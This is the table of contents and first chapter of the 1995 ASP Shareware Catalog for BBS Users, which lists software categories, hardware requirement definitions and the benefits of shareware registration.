+ 2.3.2 Keyboard . . . . . . . . . . . . . . . . 63 + 2.3.3 Screen . . . . . . . . . . . . . . . . . 64 + 2.3.3.1 EGA/VGA specific . . . . . . . . . 66 + 2.3.3.2 Screen savers . . . . . . . . . . . 67 + 2.3.3.3 Screen capture . . . . . . . . . . 71 + 2.3.4 286/386/486-specific . . . . . . . . . . 73 + 2.3.5 Sound card . . . . . . . . . . . . . . . 73 + 2.3.6 Serial & parallel port . . . . . . . . . 73 + 2.3.7 CD-ROM . . . . . . . . . . . . . . . . . 75 + 2.4 Printer utilities . . . . . . . . . . . . . . 76 + 2.4.1 Print spoolers . . . . . . . . . . . . . 80 + 2.4.2 Printer control . . . . . . . . . . . . 81 + 2.4.3 UPCs & bar codes . . . . . . . . . . . . 82 + 2.4.4 Envelope addressers . . . . . . . . . . 83 + 2.4.5 Printer specific . . . . . . . . . . . . 86 + 2.4.5.1 Epson . . . . . . . . . . . . . . . 87 + 2.4.5.2 HP DeskJet . . . . . . . . . . . . 88 + 2.4.5.3 HP LaserJet . . . . . . . . . . . . 89 + 2.4.5.4 PostScript . . . . . . . . . . . . 93 + 2.5 System utilities . . . . . . . . . . . . . . 94 + + ii + + + + 2.5.1 Operating systems . . . . . . . . . . . 94 + 2.5.1.1 Task-switching . . . . . . . . . . 95 + 2.5.2 Multi-OS utilities . . . . . . . . . . . 95 + 2.5.3 Command processors . . . . . . . . . . . 97 + 2.5.4 Batch & macro utilities . . . . . . . 101 + 2.5.4.1 Batch file compilers . . . . . . 106 + 2.5.5 Configuration utilities . . . . . . . 106 + 2.5.6 Recovery utilities . . . . . . . . . . 110 + 2.5.7 Fonts . . . . . . . . . . . . . . . . 111 + 2.5.7.1 PostScript fonts . . . . . . . . 111 + 2.5.7.2 TrueType fonts . . . . . . . . . 112 + 2.5.8 Other . . . . . . . . . . . . . . . . 115 + 2.6 Desktop utilities . . . . . . . . . . . . . 116 + 2.6.1 Multi-function . . . . . . . . . . . . 118 + 2.6.2 Calculators . . . . . . . . . . . . . 122 + 2.6.3 Calendars . . . . . . . . . . . . . . 123 + 2.6.4 Clocks . . . . . . . . . . . . . . . . 127 + 2.6.4.1 Precision timers . . . . . . . . 127 + 2.6.5 Phone dialers . . . . . . . . . . . . 128 + 2.6.5.1 Rolodex programs . . . . . . . . 131 + 2.6.6 Alarms . . . . . . . . . . . . . . . . 134 + 2.6.7 ASCII charts . . . . . . . . . . . . . 135 + 2.6.8 Notepads . . . . . . . . . . . . . . . 135 + 2.6.9 Personal information managers (PIMs) . 137 + 2.6.10 Time management . . . . . . . . . . . 146 + 2.6.11 Journal/diary programs . . . . . . . 149 + 2.7 Menu systems & file managers . . . . . . . 152 + 2.7.1 Menu systems . . . . . . . . . . . . . 152 + 2.7.2 File managers . . . . . . . . . . . . 157 + 2.7.3 Combined MS/FMs . . . . . . . . . . . 162 + 2.7.4 MS/FMs for developers . . . . . . . . 165 + 2.7.5 Work environment managers . . . . . . 165 + 2.7.6 Software tools . . . . . . . . . . . . 167 + 2.7.6.1 For multiple programs . . . . . . 167 + 2.8 Security programs . . . . . . . . . . . . . 167 + 2.8.1 Virus/Trojan detectors . . . . . . . . 168 + 2.8.2 Virus cleanup/removal . . . . . . . . 170 + 2.8.3 System activity monitors . . . . . . . 170 + 2.8.4 File integrity monitors . . . . . . . 171 + 2.8.5 Computer access security . . . . . . . 172 + 2.9 Software tools & add-ins . . . . . . . . . 173 + 2.9.1 For multiple programs . . . . . . . . 173 + 2.9.2 For operating systems . . . . . . . . 175 + 2.9.2.1 MS-DOS . . . . . . . . . . . . . 175 + 2.9.2.2 Windows . . . . . . . . . . . . . 175 + 2.9.2.3 OS/2 . . . . . . . . . . . . . . 180 + 2.9.3 For JP Software . . . . . . . . . . . 180 + 2.9.3.1 For 4DOS/NDOS . . . . . . . . . . 181 + 2.9.4 For Norton . . . . . . . . . . . . . . 181 + 2.9.4.1 For Norton Utilities . . . . . . 181 + 2.9.5 For PKWARE . . . . . . . . . . . . . . 181 + 2.9.5.1 For PKZIP/PKUNZIP . . . . . . . . 181 + 2.9.6 For Sidekick . . . . . . . . . . . . . 183 + 2.9.7 For other . . . . . . . . . . . . . . 183 + + iii + + + + Chapter 3: Writing applications 184 + 3.1 Text viewers/readers . . . . . . . . . . . 184 + 3.2 Text editors . . . . . . . . . . . . . . . 185 + 3.2.1 Text/binary editors . . . . . . . . . 191 + 3.3 Text organizers/outliners . . . . . . . . . 192 + 3.4 Word processors . . . . . . . . . . . . . . 193 + 3.5 Desktop publishing . . . . . . . . . . . . 196 + 3.6 Spelling checkers . . . . . . . . . . . . . 201 + 3.7 Dictionaries . . . . . . . . . . . . . . . 203 + 3.8 Thesaurus . . . . . . . . . . . . . . . . . 203 + 3.9 Style checkers . . . . . . . . . . . . . . 204 + 3.10 Bibliography . . . . . . . . . . . . . . . 207 + 3.11 Document boilerplates . . . . . . . . . . 208 + 3.11.1 Resume' . . . . . . . . . . . . . . . 208 + 3.12 Document control & management . . . . . . 209 + 3.13 Creativity & brainstorming . . . . . . . . 210 + 3.14 Writing utilities . . . . . . . . . . . . 212 + 3.14.1 File format translators . . . . . . . 214 + 3.15 Software tools & macros . . . . . . . . . 214 + 3.15.1 For multiple programs . . . . . . . . 214 + 3.15.2 For PC-Write . . . . . . . . . . . . 215 + 3.15.3 For Word . . . . . . . . . . . . . . 215 + 3.15.3.1 Word for Windows . . . . . . . . 215 + 3.15.4 For WordStar . . . . . . . . . . . . 222 + 3.15.5 For WordPerfect . . . . . . . . . . . 223 + 3.15.6 For other . . . . . . . . . . . . . . 227 + + Chapter 4: Spreadsheet applications 228 + 4.1 Spreadsheet programs . . . . . . . . . . . 228 + 4.2 Boilerplates/templates . . . . . . . . . . 230 + 4.3 Spreadsheet utilities . . . . . . . . . . . 231 + 4.3.1 File format translators . . . . . . . 231 + 4.4 Software tools & add-ins . . . . . . . . . 231 + 4.4.1 For multiple programs . . . . . . . . 231 + 4.4.2 For Lotus . . . . . . . . . . . . . . 232 + 4.4.3 For Excel . . . . . . . . . . . . . . 232 + + Chapter 5: Database applications 233 + 5.1 Relational database managers . . . . . . . 233 + 5.2 Flat-file database managers . . . . . . . . 237 + 5.3 Mailing list systems . . . . . . . . . . . 240 + 5.4 Freeform/text database managers . . . . . . 243 + 5.5 Database utilities . . . . . . . . . . . . 245 + 5.5.1 File format translators . . . . . . . 247 + 5.6 Software tools & add-ins . . . . . . . . . 247 + 5.6.1 For multiple programs . . . . . . . . 247 + 5.6.2 For dBASE . . . . . . . . . . . . . . 249 + 5.6.2.1 dBASE III specific . . . . . . . 250 + 5.6.3 For FoxPro/FoxBASE+ . . . . . . . . . 251 + 5.6.4 For Paradox . . . . . . . . . . . . . 255 + 5.6.5 For Clipper . . . . . . . . . . . . . 256 + 5.6.6 For other . . . . . . . . . . . . . . 257 + 5.7 Other . . . . . . . . . . . . . . . . . . . 258 + + iv + + + + Chapter 6: Data 259 + 6.1 Words . . . . . . . . . . . . . . . . . . . 259 + 6.1.1 Names . . . . . . . . . . . . . . . . 259 + 6.2 Mapping data . . . . . . . . . . . . . . . 259 + 6.3 Corporate data . . . . . . . . . . . . . . 259 + 6.4 Marketing data . . . . . . . . . . . . . . 259 + 6.5 World facts . . . . . . . . . . . . . . . . 260 + 6.6 Zip codes . . . . . . . . . . . . . . . . . 260 + 6.7 Area codes . . . . . . . . . . . . . . . . 261 + 6.8 Census data . . . . . . . . . . . . . . . . 261 + 6.9 Engineering data . . . . . . . . . . . . . 261 + 6.9.1 For mechanical engineering . . . . . . 262 + 6.9.2 For other . . . . . . . . . . . . . . 262 + 6.10 Quotes & anecdotes . . . . . . . . . . . . 262 + 6.11 Encyclopedias . . . . . . . . . . . . . . 263 + 6.12 Software tools & add-ins . . . . . . . . . 263 + 6.12.1 For multiple programs . . . . . . . . 263 + + Chapter 7: Business 264 + 7.1 Business finances . . . . . . . . . . . . . 264 + 7.1.1 Business accounting . . . . . . . . . 266 + 7.1.1.1 Accounts receivable . . . . . . . 274 + 7.1.2 Point-of-sale systems . . . . . . . . 274 + 7.1.3 Billing/invoice systems . . . . . . . 278 + 7.1.4 Purchase order systems . . . . . . . . 283 + 7.1.5 Payroll systems . . . . . . . . . . . 284 + 7.2 Inventory systems . . . . . . . . . . . . . 285 + 7.3 Decision analysis tools . . . . . . . . . . 291 + 7.4 Equipment use & maintenance . . . . . . . . 293 + 7.4.1 Computer-use logging . . . . . . . . . 294 + 7.5 Employee management/scheduling . . . . . . 296 + 7.6 Project management . . . . . . . . . . . . 300 + 7.6.1 Project bidding & costing . . . . . . 302 + 7.6.2 Project scheduling . . . . . . . . . . 303 + 7.7 Client management . . . . . . . . . . . . . 304 + 7.8 Organization charts . . . . . . . . . . . . 307 + 7.9 Specific-field systems . . . . . . . . . . 308 + 7.9.1 Construction, installation & repair . 308 + 7.9.2 Farming & ranching . . . . . . . . . . 309 + 7.9.3 Food services . . . . . . . . . . . . 309 + 7.9.4 Hotel/motel management . . . . . . . . 312 + 7.9.5 Legal & law enforcement . . . . . . . 312 + 7.9.6 Library . . . . . . . . . . . . . . . 313 + 7.9.7 Medical & dental . . . . . . . . . . . 314 + 7.9.8 Non-profit businesses . . . . . . . . 314 + 7.9.8.1 Fund raising . . . . . . . . . . 314 + 7.9.9 Political parties . . . . . . . . . . 315 + 7.9.10 Real estate . . . . . . . . . . . . . 316 + 7.9.11 Safety & fire protection . . . . . . 318 + 7.9.12 Small businesses . . . . . . . . . . 318 + 7.9.13 Other . . . . . . . . . . . . . . . . 321 + 7.10 Forms generators . . . . . . . . . . . . . 322 + 7.10.1 Forms fillers . . . . . . . . . . . . 324 + 7.10.2 Forms processing . . . . . . . . . . 324 + + v + + + + 7.11 Sales aids . . . . . . . . . . . . . . . . 324 + 7.12 Marketing . . . . . . . . . . . . . . . . 326 + 7.13 Work-at-home . . . . . . . . . . . . . . . 327 + 7.14 Training & support aids . . . . . . . . . 329 + 7.14.1 Lecturing & slide shows . . . . . . . 330 + 7.14.2 Job interviewing . . . . . . . . . . 332 + 7.14.3 "Help desk" applications . . . . . . 332 + 7.15 Simulators & what-ifs . . . . . . . . . . 332 + 7.16 Business utilities . . . . . . . . . . . . 333 + 7.16.1 Weights & measurements . . . . . . . 335 + 7.17 Software tools & add-ins . . . . . . . . . 335 + 7.17.1 For multiple programs . . . . . . . . 335 + 7.17.2 For other . . . . . . . . . . . . . . 336 + 7.18 Other . . . . . . . . . . . . . . . . . . 337 + + Chapter 8: Finances 338 + 8.1 Stock trading & analysis . . . . . . . . . 338 + 8.2 Personal finances . . . . . . . . . . . . . 341 + 8.2.1 Finances & budgets . . . . . . . . . . 346 + 8.2.2 Checkbook managers . . . . . . . . . . 349 + 8.3 Portfolio management . . . . . . . . . . . 351 + 8.4 Financial calculators . . . . . . . . . . . 353 + 8.5 Income tax preparation . . . . . . . . . . 355 + 8.6 Finance utilities . . . . . . . . . . . . . 355 + + Chapter 9: Engineering 358 + 9.1 Civil engineering . . . . . . . . . . . . . 358 + 9.2 Electrical engineering . . . . . . . . . . 358 + 9.3 Industrial engineering . . . . . . . . . . 360 + 9.4 Mechanical engineering . . . . . . . . . . 360 + 9.5 Structural analysis . . . . . . . . . . . . 362 + 9.6 Surveying & cartography . . . . . . . . . . 362 + 9.7 Engineering utilities . . . . . . . . . . . 363 + 9.7.1 File format translators . . . . . . . 366 + 9.8 Software tools & add-ins . . . . . . . . . 366 + 9.8.1 For multiple programs . . . . . . . . 366 + 9.8.2 For other . . . . . . . . . . . . . . 367 + 9.9 Other . . . . . . . . . . . . . . . . . . . 368 + + Chapter 10: Communications 370 + 10.1 General-purpose modem communications . . . 370 + 10.2 Service-specific programs . . . . . . . . 373 + 10.2.1 For CompuServe . . . . . . . . . . . 373 + 10.2.2 For GEnie . . . . . . . . . . . . . . 374 + 10.2.3 For Internet . . . . . . . . . . . . 374 + 10.3 Bulletin boards . . . . . . . . . . . . . 375 + 10.3.1 Bulletin board utilities . . . . . . 376 + 10.4 Networks . . . . . . . . . . . . . . . . . 376 + 10.4.1 Modem-based networks . . . . . . . . 383 + 10.4.2 Network utilities . . . . . . . . . . 383 + 10.5 Remote computer access . . . . . . . . . . 386 + 10.6 Fax machines & fax cards . . . . . . . . . 387 + 10.7 Voice mail systems . . . . . . . . . . . . 388 + 10.8 Call logging & analysis . . . . . . . . . 388 + + vi + + + + 10.8.1 Phone bill analyzers . . . . . . . . 388 + 10.9 File transfer protocols . . . . . . . . . 389 + 10.10 Communication utilities . . . . . . . . . 390 + 10.10.1 File format translators . . . . . . 391 + 10.11 Software tools & add-ins . . . . . . . . 391 + 10.11.1 For multiple programs . . . . . . . 391 + 10.11.2 For TAPCIS . . . . . . . . . . . . . 391 + 10.11.3 For PCBoard . . . . . . . . . . . . 391 + 10.11.4 For Qmodem . . . . . . . . . . . . . 391 + 10.11.5 For OzCIS . . . . . . . . . . . . . 391 + 10.11.6 For other . . . . . . . . . . . . . 391 + 10.12 Other . . . . . . . . . . . . . . . . . . 392 + + Chapter 11: Mathematics 394 + 11.1 General math . . . . . . . . . . . . . . . 394 + 11.2 Statistics . . . . . . . . . . . . . . . . 395 + 11.3 Function & curve plotting . . . . . . . . 397 + 11.4 Mathematical utilities . . . . . . . . . . 398 + + Chapter 12: Computer programming 399 + 12.1 CASE tools . . . . . . . . . . . . . . . . 399 + 12.2 Database engines . . . . . . . . . . . . . 399 + 12.3 Debuggers . . . . . . . . . . . . . . . . 401 + 12.4 Languages . . . . . . . . . . . . . . . . 402 + 12.4.1 Assembler . . . . . . . . . . . . . . 402 + 12.4.2 BASIC . . . . . . . . . . . . . . . . 403 + 12.4.2.1 Visual BASIC . . . . . . . . . . 404 + 12.4.3 C . . . . . . . . . . . . . . . . . . 414 + 12.4.3.1 C++ . . . . . . . . . . . . . . 419 + 12.4.4 COBOL . . . . . . . . . . . . . . . . 420 + 12.4.5 Pascal . . . . . . . . . . . . . . . 421 + 12.4.5.1 OOP Pascal for DOS (Borland) . . 423 + 12.4.6 Other . . . . . . . . . . . . . . . . 423 + 12.5 Hypertext/hypermedia . . . . . . . . . . . 424 + 12.6 Tutorials . . . . . . . . . . . . . . . . 426 + 12.7 Software installation aids . . . . . . . . 427 + 12.8 Software testing aids . . . . . . . . . . 432 + 12.9 Programming utilities . . . . . . . . . . 433 + 12.9.1 Desktop tools for programmers . . . . 434 + 12.9.2 `Help' utilities . . . . . . . . . . 436 + 12.10 Software tools & add-ins . . . . . . . . 436 + 12.10.1 For multiple programs . . . . . . . 437 + 12.10.2 For other . . . . . . . . . . . . . 437 + + Chapter 13: Education 440 + 13.1 Preschool . . . . . . . . . . . . . . . . 440 + 13.2 Elementary . . . . . . . . . . . . . . . . 444 + 13.3 Junior high . . . . . . . . . . . . . . . 454 + 13.4 High school . . . . . . . . . . . . . . . 455 + 13.5 College . . . . . . . . . . . . . . . . . 458 + 13.6 Library/bibliography . . . . . . . . . . . 459 + 13.7 Teachers . . . . . . . . . . . . . . . . . 461 + 13.7.1 Gradebooks . . . . . . . . . . . . . 464 + 13.8 Computers . . . . . . . . . . . . . . . . 464 + + vii + + + + 13.8.1 Computer hardware tutors . . . . . . 465 + 13.8.2 Operating system tutors . . . . . . . 466 + 13.8.3 Educational computer games . . . . . 467 + 13.9 Foreign language . . . . . . . . . . . . . 468 + 13.10 Geography . . . . . . . . . . . . . . . . 472 + 13.11 History . . . . . . . . . . . . . . . . . 473 + 13.12 Literature . . . . . . . . . . . . . . . 476 + 13.13 Math . . . . . . . . . . . . . . . . . . 476 + 13.14 Music . . . . . . . . . . . . . . . . . . 476 + 13.15 Science & ecology . . . . . . . . . . . . 478 + 13.16 Writing . . . . . . . . . . . . . . . . . 481 + 13.17 Software tools & add-ins . . . . . . . . 482 + 13.17.1 For other . . . . . . . . . . . . . 482 + 13.18 Other . . . . . . . . . . . . . . . . . . 482 + + Chapter 14: Graphics 484 + 14.1 Viewing programs . . . . . . . . . . . . . 484 + 14.2 Drawing/editor programs . . . . . . . . . 486 + 14.3 Paint programs . . . . . . . . . . . . . . 492 + 14.3.1 Graphics diversions . . . . . . . . . 494 + 14.4 Presentation graphics . . . . . . . . . . 496 + 14.4.1 Animation applications . . . . . . . 497 + 14.4.1.1 "Morphing" applications . . . . 498 + 14.5 CAD/CAM applications . . . . . . . . . . . 499 + 14.5.1 Vector/ray tracing . . . . . . . . . 504 + 14.6 Business applications . . . . . . . . . . 504 + 14.6.1 OCR applications . . . . . . . . . . 507 + 14.6.2 Mapping/cartography . . . . . . . . . 508 + 14.7 Ready-made graphic images . . . . . . . . 510 + 14.7.1 BMP images . . . . . . . . . . . . . 510 + 14.7.2 PCX images . . . . . . . . . . . . . 510 + 14.7.3 WPG images . . . . . . . . . . . . . 510 + 14.7.4 For adults only . . . . . . . . . . . 510 + 14.7.5 Other formats . . . . . . . . . . . . 511 + 14.8 Utilities . . . . . . . . . . . . . . . . 511 + 14.8.1 Cataloging tools . . . . . . . . . . 511 + 14.8.2 Graphic screen capture . . . . . . . 512 + 14.8.3 Graphic print screen . . . . . . . . 514 + 14.8.4 File format translators . . . . . . . 514 + 14.9 Software tools & add-ins . . . . . . . . . 515 + 14.9.1 For multiple programs . . . . . . . . 515 + 14.9.2 For AutoCAD . . . . . . . . . . . . . 515 + 14.9.3 For other . . . . . . . . . . . . . . 515 + + Chapter 15: Home & hobby 517 + 15.1 Arts & crafts . . . . . . . . . . . . . . 517 + 15.2 Astronomy . . . . . . . . . . . . . . . . 518 + 15.3 Computers . . . . . . . . . . . . . . . . 520 + 15.4 Collecting . . . . . . . . . . . . . . . . 521 + 15.5 Fortune telling & astrology . . . . . . . 530 + 15.6 Gambling . . . . . . . . . . . . . . . . . 536 + 15.7 Gardening . . . . . . . . . . . . . . . . 538 + 15.8 Genealogy . . . . . . . . . . . . . . . . 539 + 15.8.1 Pedigrees . . . . . . . . . . . . . . 542 + + viii + + + + 15.9 Ham radio . . . . . . . . . . . . . . . . 543 + 15.10 Health . . . . . . . . . . . . . . . . . 544 + 15.10.1 Food/dietary/kitchen . . . . . . . . 544 + 15.10.2 Exercise/fitness . . . . . . . . . . 549 + 15.11 Household automation . . . . . . . . . . 550 + 15.12 How-to projects . . . . . . . . . . . . . 552 + 15.13 Hunting & fishing . . . . . . . . . . . . 552 + 15.14 Lottery . . . . . . . . . . . . . . . . . 554 + 15.15 Movies & video tapes . . . . . . . . . . 557 + 15.16 Music . . . . . . . . . . . . . . . . . . 558 + 15.17 Personalities . . . . . . . . . . . . . . 565 + 15.17.1 Diaries & journals . . . . . . . . . 566 + 15.18 Photography . . . . . . . . . . . . . . . 566 + 15.19 Planes, trains & automobiles . . . . . . 566 + 15.20 Quotes & anecdotes . . . . . . . . . . . 567 + 15.21 Reading (and writing, too) . . . . . . . 567 + 15.22 Scouting . . . . . . . . . . . . . . . . 568 + 15.23 Self development . . . . . . . . . . . . 572 + 15.24 Sports . . . . . . . . . . . . . . . . . 573 + 15.24.1 Betting pools . . . . . . . . . . . 573 + 15.24.2 Handicapping . . . . . . . . . . . . 573 + 15.24.2.1 For `the ponies' . . . . . . . 574 + 15.24.2.2 For other . . . . . . . . . . . 575 + 15.24.3 Baseball/softball . . . . . . . . . 575 + 15.24.4 Basketball . . . . . . . . . . . . . 577 + 15.24.5 Boating sports . . . . . . . . . . . 578 + 15.24.6 Firearms . . . . . . . . . . . . . . 578 + 15.24.7 Football . . . . . . . . . . . . . . 579 + 15.24.8 Golf . . . . . . . . . . . . . . . . 581 + 15.24.9 Martial arts . . . . . . . . . . . . 582 + 15.24.10 Soccer/rugby . . . . . . . . . . . 582 + 15.24.11 Other . . . . . . . . . . . . . . . 582 + 15.25 Travel . . . . . . . . . . . . . . . . . 584 + 15.26 Other . . . . . . . . . . . . . . . . . . 584 + + Chapter 16: Religion & philosophy 586 + 16.1 The Bible . . . . . . . . . . . . . . . . 586 + 16.1.1 Bible programs . . . . . . . . . . . 587 + 16.2 For houses of worship . . . . . . . . . . 587 + 16.3 New age/occult . . . . . . . . . . . . . . 589 + 16.4 Philosophy . . . . . . . . . . . . . . . . 590 + 16.4.1 Metaphysics . . . . . . . . . . . . . 590 + 16.5 Software tools & add-ins . . . . . . . . . 591 + 16.5.1 For other . . . . . . . . . . . . . . 591 + 16.6 Other . . . . . . . . . . . . . . . . . . 592 + + Chapter 17: Games 593 + 17.1 Adventure . . . . . . . . . . . . . . . . 593 + 17.2 Arcade games . . . . . . . . . . . . . . . 596 + 17.3 Board games . . . . . . . . . . . . . . . 597 + 17.3.1 Backgammon . . . . . . . . . . . . . 597 + 17.3.2 Mahjong . . . . . . . . . . . . . . . 598 + 17.3.3 Other . . . . . . . . . . . . . . . . 599 + 17.4 Card games . . . . . . . . . . . . . . . . 600 + + ix + + + + 17.4.1 Solitaire . . . . . . . . . . . . . . 602 + 17.5 Non-card games . . . . . . . . . . . . . . 604 + 17.5.1 Solitaire . . . . . . . . . . . . . . 604 + 17.6 Casino games . . . . . . . . . . . . . . . 606 + 17.7 Dungeons & Dragons . . . . . . . . . . . . 608 + 17.8 Jokes & humor . . . . . . . . . . . . . . 608 + 17.9 Logic & brain games . . . . . . . . . . . 610 + 17.10 Practical jokes . . . . . . . . . . . . . 612 + 17.11 Puzzles, mix & match . . . . . . . . . . 612 + 17.12 Sayings & stories . . . . . . . . . . . . 617 + 17.13 Simulators . . . . . . . . . . . . . . . 617 + 17.13.1 Sports . . . . . . . . . . . . . . . 618 + 17.14 Star Trek & Star Wars . . . . . . . . . . 619 + 17.15 Strategy/simulation . . . . . . . . . . . 619 + 17.15.1 War games . . . . . . . . . . . . . 625 + 17.16 Trivia . . . . . . . . . . . . . . . . . 626 + 17.17 Word games . . . . . . . . . . . . . . . 627 + 17.17.1 Crossword puzzles . . . . . . . . . 632 + 17.17.2 Cryptanalysis . . . . . . . . . . . 634 + 17.17.3 Word search . . . . . . . . . . . . 635 + 17.18 For adults . . . . . . . . . . . . . . . 636 + 17.19 Game utilities . . . . . . . . . . . . . 636 + + Chapter 18: About shareware 637 + 18.1 Assn. Shareware Professionals . . . . . . 637 + 18.2 For shareware authors . . . . . . . . . . 641 + 18.3 For shareware disk vendors . . . . . . . . 642 + 18.4 Software tools & add-ins . . . . . . . . . 643 + 18.4.1 For multiple programs . . . . . . . . 643 + + Chapter 19: Other 644 + 19.1 Software tools & add-ins . . . . . . . . . 644 + 19.1.1 For multiple programs . . . . . . . . 644 + 19.1.2 For other . . . . . . . . . . . . . . 644 + 19.2 Other . . . . . . . . . . . . . . . . . . 644 + + + Part 2: Appendixes + + + Appendix A: Author addresses 646 + + Appendix B: Vendor addresses 703 + + Appendix C: Bulletin Boards 726 + + Appendix D: Retired shareware 761 + + Appendix E: Sorted list of all programs 765 + + Appendix F: Supporting Members 786 + + Index 787 + + + + + + + + + + ASP Shareware Catalog for BBS Users (Master Edition) + th rd + 4 volume, 23 edition + Published November 2, 1995 + + Copyright 1995 by the Association of Shareware Professionals + (ASP), a non-profit organization; all rights reserved. Any + specific hardware/software names used in this catalog are the + (registered) trademarks of specific companies. Individuals, + bulletin board systems, national information systems, non-profit + organizations, and government agencies may freely distribute this + document in electronic form. For-profit disk vendor companies + may distribute this document in electronic form if they have an + ASP associate membership and if they charge only their normal + distribution fees. All others must obtain prior written per- + mission from the Association of Shareware Professionals. Write + to the ASP at 545 Grover Road, Muskegon, MI 49442. + + The programs & services described in this catalog come from + members of the Association of Shareware Professionals. This + catalog may not list every ASP-member product and it may not be + current. Send all comments about the catalog to the above + address, or to CompuServe userID 70007,4004, or as a message in + the CompuServe SHAREWARE forum. + + ASP strives to produce accurate catalogs BUT this publication may + contain any number of typographical, graphical, printing, or + interpretation errors. + + "These programs are produced by members of the Associa- + tion of Shareware Professionals (ASP). ASP wants to + make sure that the shareware principle works for you. + If you are unable to resolve a shareware-related problem + with an ASP member by contacting the member directly, + ASP may be able to help. The ASP Ombudsman can help you + resolve a dispute or problem with an ASP member, but + does not provide technical support for members' + products. Please write to the ASP Ombudsman at 545 + Grover Road, Muskegon, MI 49442 or send a Compuserve + message via Compuserve Mail to ASP Ombuds- + man 70007,3536". The Ombudsman may be contacted by FAX + by sending to the ASP FAX number: (616) 788-2765. In + communication with the Ombudsman please include a tele- + phone number and/or FAX if available. + + Please write to the ASP at the above address if you have any + comments or questions about this catalog. + + ASP Catalog for BBS Users (Master Edition) 2 + + + + + + Chapter 1 + How to read this catalog + + ASP members have supplied product descriptions for each shareware + application they offer. The catalog groups them by subject + matter and lists them alphabetically. If you want to know the + name/address/phone for the author of a particular program, turn + to the index and look for the program by name. You'll usually + see two page references: one describes the page where you read + about the program, the other mentions the page where you can find + information about the author (in Appendix A). Just turn to the + appropriate page and scan for the name of the program. + + The Association of Shareware Professionals does NOT rate members' + software for functionality or usefulness, nor can it attest to + the validity of any product description in this catalog. That is + for you - the user - to decide. Shareware, especially those + products authorized to carry the ASP logo, can be tested on a + "try before you buy" basis. If the software doesn't meet your + needs, you won't have to worry about getting a refund. (That's + the beauty of the shareware marketing concept.) + + + 1.1 Minimum requirements + + Every program description lists its computer and operating system + requirements (e.g. "IBM PC, DOS 2.0 or better"). Unless noted + otherwise, each program assumes you have a standard keyboard, + monitor, printer, and either two floppy drives or a hard disk. + And unless noted otherwise, programs written for the IBM PC + assume you have at least 512k of total installed RAM. Many pro- + grams may also need specific hardware or software such as: + CD-ROM drive + A device capable of reading CD-ROMs. A CD-ROM + looks just like a regular compact disk with music + on it, but it has information on it only a + computer's CD-ROM drive can read. + CGA monitor A video monitor capable of displaying CGA + graphics. This includes most "laptop CGA" + computers, plus higher resolution monitors such as + the EGA or VGA. Some (but not all) of the + described programs may operate correctly with a + Hercules monitor if you use a "CGA simulator" + program; consult your video monitor manual for + details. + Dual 720k disk drives + At least two floppy drives capable of writing at + least 720k of data per disk, or, preferably, a + hard disk (see below). + + ASP Catalog for BBS Users (Master Edition) 3 + + + + EGA monitor A video monitor capable of displaying EGA + graphics. This almost always includes VGA and + other higher-resolution monitors. CGA and + Hercules monitors won't suffice. + EMS memory Memory accessible via the Lotus-Intel-Microsoft + Expanded Memory Specification. Not to be confused + with expanded memory, extended memory, or XMS + memory (see below). Windows, OS/2, and newer + versions of DOS come with software designed to + implement EMS memory on computers with enough + installed memory. + Epson printer + A printer capable of recognizing the Epson print + command set (an industry standard). Some + printers, including some laser printers, have + options to behave like an Epson printer. Some + programs may require a specific model such as the + Epson MX-80 or FX-100. + Hard disk A fixed-, removable-, or network-drive device + capable of storing multiple megabytes of data. + Some programs also assume you have at least one + floppy drive in addition to the hard disk. + Hercules monitor + A video monitor capable of displaying Hercules + graphics. CGA, EGA, VGA, & SVGA monitors won't + suffice. + HP DeskJet A Hewlett-Packard DeskJet or compatible printer. + Some programs may require a DeskJet starting with + a specific model such as the DeskJet Plus or + having a specific feature like a RAM cartridge. + HP LaserJet A Hewlett-Packard LaserJet or compatible printer. + (HP DeskJet printers recognize most, but not all, + of the HP LaserJet command set.) Some programs + may require a specific model such as the LaserJet + II or with a specific feature like the LaserJet + IIIDSi. + Math coprocessor + An IBM PC or compatible computer with an installed + math coprocessor unit. Commonly referred to as an + "80x87 chip," these include the 8087, 80287, and + 80387 coprocessors. (80486- and Pentium-based + computers have math coprocessors by default.) + Most 8086-, 80286-, and 80386-based IBM PCs & + compatibles have no installed math coprocessor by + default. (80286- and 80386-based computers can + accept a math coprocessor if you purchase one.) + Modem A modem. Almost all programs work with a "Hayes + compatible" modem, specifically one able to + recognize the Hayes command set (an industry + standard). A few programs claim to work with non- + Hayes modems too. Some programs may require the + modem to operate at a specific rate of speed (e.g. + "1200 baud"). + Mouse A Logitec- or Microsoft-compatible mouse. + + ASP Catalog for BBS Users (Master Edition) 4 + + + + Network A computer hooked up a local area network (LAN). + Program descriptions will normally specify the + different types of LAN systems under which they + can operate. + Plotter A plotter output device. Many of the described + programs need a plotter able to recognize the HPGL + (Hewlett Packard Graphics Language) command set. + PostScript printer + A printer able to interpret the PostScriptr + command set. Many printers (including the HP + LaserJet series) offer PostScript compatibility + via plug-in cartridges. Software also exists to + emulate PostScript on hundreds of popular + printers. + SVGA monitor + A video monitor capable of displaying SVGA + graphics. This almost always includes higher- + resolution monitors. CGA, EGA, VGA, and Hercules + monitors won't suffice. + Streaming tape device + A device capable of reading streaming tapes. Also + referred to as a "tape backup device." Streaming + tapes look something like a standard music + cassette or videocassette, but it holds + information only a computer can read. Common + streaming tapes include DC600, DC2000, DC2120; + tape storage formats include QIC-40 and QIC-80. + VGA monitor A video monitor capable of displaying VGA + graphics. This almost always includes higher- + resolution monitors. CGA, EGA, and Hercules + monitors won't suffice. + XMS memory Memory accessible via the Lotus-Intel-Microsoft + eXtended Memory Specification. Not to be confused + with expanded memory, extended memory, or EMS + memory (see above). Windows, OS/2, and newer + versions of DOS come with software designed to + implement XMS memory on computers with enough + installed memory. + + + 1.2 Registration benefits + + All ASP member shareware products come with certain minimum + benefits when you register. The author must acknowledge your + registration (you don't just get a canceled check) and must + provide a minimum amount of technical support for at least three + months. + + Many authors provide other registration benefits such as a + printed manual, a master disk, a year of unlimited phone support, + source code, etc. The product description will mention them when + appropriate. + + ASP Catalog for BBS Users (Master Edition) 5 + + + + In addition, every ASP member can offer the following benefits to + registered customers: + + CompuServe + IntroPak obtain an introductory membership to the Compu- + Serve network with a $15 usage credit when you + register an ASP member's shareware product. + + Many authors include this information when they acknowledge + registrations. Contact the author if you need assistance. + + Some authors add "registration reminder screens" to the shareware + version of a program as a way to gently remind people to + register. (The ASP sets ethical standards regarding it.) Almost + all authors will either send a copy of the program without + reminder screens, or will disclose a method to disable the + reminders, once you register the product. + + + 1.3 Sample product description + + This sample description will help you understand what each field + means: + + Product: Shareware Program Name [***] 